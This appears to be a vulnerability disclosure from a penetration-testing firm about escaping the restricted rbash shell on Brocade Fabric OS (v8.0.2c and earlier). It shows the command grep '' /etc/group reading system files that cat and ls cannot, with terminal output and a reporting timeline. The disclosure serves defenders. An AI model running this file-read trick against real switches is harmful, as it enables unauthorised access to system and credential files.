Brocade Fabric OS ≤ v8.0.2c rbash escape to read system files
Broadcom offers a number of products and networking solutions such as switches, extensions etc. These products come with their own operating system, i.e. the Fabric OS. It is a lightweight OS that upon logging in through
telnet one is found within the restricted environment of
rbash. The user is not able to execute any of the known system commands, such as
cat, etc but only some available custom commands the developers have made themselves e.g.
... iflshow Display edge switch FCR connection information interfaceshow Display the FSPF (TM) interface information iodset Manage the in-order delivery (IOD) option iodshow Display the state of the in-order delivery option ipaddrset Set ethernet and FC IP addresses ipaddrshow Print ethernet and FC IP addresses islshow Display the current connections and status ...
One of the available commands is the classic system command
grep. The system also allows pipelines
|, which explains the reason for them to allow the use of
HOSTNAME:user> ipaddrshow SWITCH Ethernet IP Address: 10.115.76.184 Ethernet Subnetmask: 255.255.254.0 Gateway IP Address: 10.115.76.251 DHCP: Off HOSTNAME:user> ipaddrshow |grep Gateway Gateway IP Address: 10.115.76.251 HOSTNAME:user>
grep available one can read underlying system files by searching for the empty pattern
''. The files one has access to depend on the authenticated user's privileges.
HOSTNAME:user> cat /etc/group rbash: cat: command not found HOSTNAME:user> ls /etc/group rbash: ls: command not found HOSTNAME:user> grep '' /etc/group root::0:root sys::3:root,bin smmsp::25:smmsp nobody::99: users::100: utmp:x:102: admin::600:admin,root user::602:user,admin,root switchadmin::604: operator::605: zoneadmin::606: fabricadmin::607: basicswitchadmin::608: securityadmin::609: udrole::550: HOSTNAME:user>
The issue was discovered by Bitcrack during a penetration test for a client and reported it to Broadcom's PSIRT. Broadcom's internal security audit discovered it earlier this year and had scheduled a fix before Bitcrack notified them.
Reported to Broadcom's PSIRT: 26/9/2022
First response and redirecting us to Brocade SIRT: 26/9/2022
Second response letting us know of the found issue: 5/10/2022
Clarifications and ask for permission to post on our blog: 10/10/2022
No response from Broadcom, release of the article: 29/11/2022